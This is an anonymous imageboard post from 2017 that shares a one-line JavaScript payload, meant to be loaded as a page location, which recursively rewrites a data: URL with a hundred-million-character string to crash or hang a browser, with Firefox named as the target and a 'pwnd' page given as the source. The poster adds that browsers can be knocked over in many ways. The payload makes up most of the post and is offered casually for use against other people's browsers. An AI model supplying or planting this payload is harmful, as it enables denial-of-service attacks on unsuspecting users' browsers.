Anonymous 07/11/2017 (Tue) 22:28:55 No. 10352 del
you could also just do this (for firefof at least)
location = "data:text/html,<script>location+=location+'A'.repeat(100000000);<\/script>";

(from http://koolkidsklub.tech/pwnd.htm)
I don't keep up with web sec anymore, but I imagine there are millions of ways to DoS a browser, even with JS off.